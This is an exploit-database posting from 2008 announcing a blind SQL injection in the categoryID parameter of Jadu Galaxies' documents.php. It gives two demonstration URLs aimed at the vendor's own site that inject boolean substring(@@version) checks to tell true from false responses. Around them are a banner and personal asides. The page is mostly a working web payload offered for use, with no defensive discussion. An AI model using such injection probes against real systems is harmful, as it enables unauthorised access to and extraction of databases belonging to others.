[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4194
Category
web applications
Date add
17-11-2008
Platform
unsorted
============================================================
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
============================================================


[~] powered by Jadu® Galaxies blind sql inj
[~]
[~] documents.php (categoryID) blind sql inj
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 17.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 45
[~]
[~] my target bug number: 100
[~]
[~] N0T: a.q bide kpss calIscaktIm : ( (
[~]
[~] -----------------------------------------------------------

exploit for demo:

http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )

http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )

[~]----------------------------------------------------------------------




#  0day.today [2024-07-07]  #